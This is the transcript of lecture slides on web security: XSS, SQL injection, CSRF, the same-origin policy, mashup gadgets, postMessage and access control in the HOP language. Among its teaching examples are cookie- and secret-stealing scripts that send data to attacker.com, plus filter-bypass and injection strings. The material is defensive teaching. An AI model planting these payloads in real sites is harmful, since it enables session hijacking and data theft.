web programming and security lecture 2 tamara rezk
TRANSCRIPT
Web Programming and Security
Lecture 2
Tamara Rezk
Security problems
Confidentiality violation
Integrity violation
Availability violation
Attacks, summary
• Phishing attacks (eg MySpace, 2006)
Attacks, summary
• Phishing attacks (eg MySpace, 2006)• Session integrity violation (eg Dansie shopping cart, 2006)
Attacks, summary
• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)
Prevention
• Server side:– add a secret that the attacker cannot guess– re-authenticate for critical operations
• User side:– logging off one site before using others
Attacks, summary
• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)• Navigation policy based attacks (eg Guninski/Citibank, 1999)
Attacks, classification?
• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)• Navigation policy based attacks (eg Guninski/Citibank, 1999)
Lessons Learned
Do not trust the client on:
• Maintaining integrity of sessions state
• Running client code
• Providing valid input
Lessons Learned
Do not trust the client on:
Providing valid inputpublic class Greeting extends HttpServlet{
public void doGet{HttpServletRequest req, HttpServletResponse res)
throws ServletException, IOException{
res.setContentType(“text/html”);
PrinterWriter out = res.getWriter();
String name = req.getParameter(“name”);
out.println(“<HTML>\n<BODY>\n”);
out.printl(“Greeting from “+ name + “\n”);
out.println(“</BODY>\n</HTML>\n”);
} }
Lessons Learned
Do not trust the client
http://host/Greeting?name=<script> …</script>
Security in Web Applications
Main source of vulnerabilities
From Cenzic Web Security Trends Report Q1-Q2-2010
• Cross-site scripting
• Information leakage
• SQL Injection
Multitier nature cause problems
12
Code injection
• Data-tier code injection (SQL)
• Client-tier code injection (Javascript)
• Server-tier code injection
SQL Injection
Query = "SELECT score FROM Student where name = ‘" + input
14
SQL Code Injection Attack, Microsoft 2008
CardSystems out of business, 2005 (SQL Code injection attack)
263000numbers stolen!
s (i1, … , in) c
s server program
i1, … , in untrusted input (provided by client)
c client code: HTML document with Javascript nodes
Dynamic Code Generation
let’s see a guestbook example
Attack to the guestbook
<script> alert(“attack!”);</script>
Embedding Javascript
<body> ... <script type="text/javascript" src=“myCode.js" />
<script type="text/javascript"> //<![CDATA[ alert("Page is loading"); //]]> </script>
<p onclick="alert('I told you not to click on me!');"> Please do not click on this text.</p> ...</body>
External Javascript File
Inline Code
Event Handler
Let’s see some other ways to inject code
Code Injection, other example
• Untrusted client input:
<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>
• Goal: inject the code to a benign user;
• Consequence: – Cookie stolen by attacker.com;– Possible sensitive private information;
Code Injection & XSS - Example
DatabaseGuestbook serverBenign user
Malicious user Attacker.com
Add entry:<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>
<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>
Get all entries
<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>
Secret cookies
Existing Server-side Prevention
Escaping FilteringEscaping Filtering
Vulnerable code
Patchedcode
TaintAnalysis
TaintAnalysis
String Analysis
String Analysis
Instruction Randomization
Instruction Randomization
Programmer Attention
Required!!
Randomizedcode
WebSSARI, Huang et al. [2004]Pixy, Jovanovic et al. [2006]Xie and Aiken [2006]…
Mimamide [2005]Balzarotti [2008]Wasermann et al. [2008]…
Example:preg_replace
("script", "",input)
“<scrscriptipt>” “<script>”
Release
……
23
Boyd et al. [2004]
HTML parser and browser quirks
• Standard HTML Parser– Obtain target syntax tree– No ill-formed result produced
• Various way of triggering JS engine(BEEP [Jim et al. 2007]– Event listener: (<DIV> :onclick "alert(msg)")– Hyperlink: (<A> :href "javascript:alert(msg)")– Dynamic code evaluation: eval, document.write
• Solution: turning off all these features in Hop– Advantage of multitier language
NOT identified by syntax difference
24
Code Injection Attack vectors
Web 2.0 Applications
27
2004: AJAX (Asynchronous Javascript and XML) becomes popular,
social sites emerge
Technologies: Web Browser, Web Server,HTTP , HTMLCGI: Common Gateway InterfaceAJAX : Javascript, CSS, XML, DOM, XMLHttpRequest
request a service
partial reloading of the webpage (iframe)
XMLHttpRequest object for asynchronous communication
Mashups: HousingMaps, 2005
Web Mashup
• Web application (client side):
• Integrating third-party gadget;
• Integrator partially sharing information to gadget;
• Example: Housingmap.com
Google Maps Gadget Integrator’sHousing Data
Great way to use your data!
29
Le Monde is a mashup
Code of Le Monde
<iframe src="http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294"frameborder="0"></iframe>
ALL OR NOTHING TRUST MODEL IN THE BROWSER
The Same Origin Policy
Programming Model – Dilemma
• Full sharing (JS Env.)• Running as integrator• Gadget trusted
• Full isolation (by SOP)• Running as gadget• Limited sharing
– Frame identifier– PostMessage
Using <script> tag Using <iframe> frame
Google Maps Gadget Integrator’sHousing Data
Google Maps Gadget Integrator’sHousing Data
X
33
The same origin policy (SOP)
• The <iframe> tag: what about Javascript behaviour?
browser
integrator’s code
<iframe src= http://b.com/gadget.js >
…</iframe>
HEAP
global object
global object
• The <script> tag permits to treat code as code from the same origin
The same origin policy (SOP)
integrator’s code
<script src=http://b.com/gadget.js>
browser
servera.com
serverb.com
The same origin policy (SOP)
• The <script> tag: what about Javascript behaviour?
browser
integrator’s code
<script src=http://b.com/gadget.js
>
The same origin policy (SOP)
An evil gadget
integrator.html<script src = “http://attacker.com/gadget.js”> </script><div id=secret>42</div></h1>
gadget.js<script>secret=document.getElementById("secret").innerHTML;setTimeout('delayer()', 5000)delayer = function(){window.location="EvilSite.php?secret="+secret;}</script>
Important JavaScript detail:
o.f is treated as o["f"]
Javascript
Thanks Shriram Krishnamurthi for this slide
lookup =function(o, fd) {
if (fd === "XHR") {return "unsafe!"; }
else {return o[fd]; } }
40
If fd is not a string, JavaScript invokes the .toString method to convert the value to a string
Is this function safe?
badObj ={toString:
function () {return "XHR"}}
lookup(window, badObj) window[badObj] window[{toString: …}] Window[{toS…: …}.toS… ()] window[(function () …) ()] window["XHR"]
…in fact,lookup
isunsafe!
41
More evals: e.g., setTimeout:
42
function f() { alert('hello'); }
setTimeout(f, 1000);
var s = "alert('hello') ";
setTimeout(s, 1000);
Any JavaScript string!
Let’s try some more code with setTimeout
<script>s="alert('Lets talk about Javascript!')";setTimeout(s, 100)</script>
<script>function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1);}r = fac(3);s = "alert("+r+")"setTimeout(s, 100)</script>
What happens now?
<script src=attacker.js></script></head><body><script>function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1);}r = fac(4);s = "alert("+r+")"setTimeout(s, 100)</script>
Anything Else?
47
• Wrap DOM nodes and callbacks• Don’t hand references to DOM nodes to the wrong functions• Avoid other conditionally unsafe calls• Be aware of implicit method calls in JavaScript’s semantics• Simulate private fields (JavaScript provides none)• Disallow arbitrary traversal of the object graph• Avoid leaking the global object
Make sure all invariants hold over 50+ entry points
Thank you Shrirma Krishnamurthi for all the recommendations!Check AdSafety
The same origin policy (SOP)
• The <iframe> tag: what about Javascript behaviour?
browser
integrator’s code
<iframe src= http://b.com/gadget.js >
…</iframe>
HEAP
global object
global object
Frame Communication
Fragment Identifier Messaging
• Send information by navigating a frame– http://gadget.com/#hello
• Navigating to fragment doesn’t reload frame– No network traffic, but frame can read its fragment
• Not a secure channel– Confidentiality– Integrity– Authentication
An attack to the Elysee?
\
http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB
http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous
http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!
An attack to the Elysee?
\
http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB
http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous
http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!
Let’s see a video
HTML 5
• Cross-origin client side communications
• Postmessage channel between frames
• Child policy
postMessage
• New API for inter-frame communication
• Supported in latest betas of many browsers
• Not a secure channel– Confidentiality– Integrity– Authentication
Reply Attack
Fix: Improve the API (Standford)
• Let the sending specify the recipient– frame[0].postMessage(“Hello”, “http://gadget.com”)– Can omit argument if confidentiality not required
• Adoption– Firefox 3– Internet Explorer 8– Safari 3.1
see Securing Frame Communication in Browsers
Security considerations postmessage
• Do not configure target origin to “*”
• Sensitive data can be leaked to unknown widgets
• Always check for sender’s origin
• Always validate data before use
• Do not consume data directly with eval() or innerHTML
Basic definitions of securityConfidential information is stored in, or communicated through “objects” protected by access rights, typically for reading, writing, and executing.
• Confidentiality : to prevent unauthorized disclosure of data we should implement:– access control– secure information flow – adequate cryptography– secure protocols
(to name a few)
Access Control
“Subjects” = programs (threads) or users, with security clearances (read/write/execute).
“Objects” = where information is stored. For instance memory locations, files, entries in a database, services, communication channels … with access rights.
Access control = the operations performed by the “subjects” over the “objects” are checked to have the appropriate clearance.
Access Control (for integrity)
A simple example in hop: A Guest Book Application
Objects = “services”
Subjects = “users calling the services” (authentication)
Access Policy = “which user can call which service”
Services Users
addentry anonymous
addentry, delete-all-entries admin
Access Control (for confidentiality)
A simple example in hop: A Broker Application
Objects = “services” showStockInfo
Subjects = “users calling the services” (authentication)
Access Policy = “No user should learn anything about stocks of other users” (each user can see only his/her confidential information on stocks)
Access control
• In Hop: wizard.hop
AUTHENTICATION PROTOCOLS
Http authentication is not really secure!!
Let’s play attacker again on an example with
“Tamper Data” and a Base64 Decoder to obtain
the password of the admin user.
SSL/TLS AUTHENTICATION
INFORMATION FLOW IN THE PROGRAM
Broker Application
(define (isUser t a) (string=? t (car a)))
(define-service (show-all-entry) … (map show-entry (filter (lambda (a) (isUser username a )) broker-private-information)))
(define-service (broker) (<HTML> (<BODY>… (<BUTTON> :onclick ~(with-hop ($show-all-entry) …)
"Share holder login“)…)))
Broker Application
(define (isUser1 t a) (string-contains t (car a)))
(define-service (show-all-entry) … (map show-entry (filter (lambda (a) (isUser1 username a )) broker-private-information)))
(define-service (broker) (<HTML> (<BODY>… (<BUTTON> :onclick ~(with-hop ($show-all-entry) …)
"Share holder login“)…)))
Availability security problems
• A service or resource is made unvailable
Availability security problems
• A service or resource is made unvailable
Common attack: DOS or Distributed DOS (DDOS)
Availability security problems
• A service or resource is made unvailable
Common attack: DOS or Distributed DOS (DDOS)
How to prevent it?
Availability security problems
Attacks, summary
• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)• Navigation policy based attacks (eg Guninski/Citibank, 1999)• Code injection attacks (eg Microsoft, 2008)• XSS attacks • Mashup based attacks• http authentication attacks• DOS attacks (Captchas)
Context – Multi-tier Language
• Unified Language• Code split to different
tiers• Example:
– LINKS [Cooper et al. 2005]
– Swift [Chong et al. 2007]
– Ur [Chlipala 2010]
– HOP [Serrano et al. 2006]
• This course focus: HOP
73
Multi-tier compilerMulti-tier compiler
Hop compilation
74
ServerBytecode
ServerBytecode
ServerBytecode
ServerBytecode
HTML
CSS
JS
Client code
compiler
Client code
compiler
HTTP
Invoke
Access URLs
Server code
compiler
Server code
compiler
Generate
Code InjectionPrevention
Code InjectionPrevention
MashicCompilerMashicCompiler
URL
URL
URL
URL
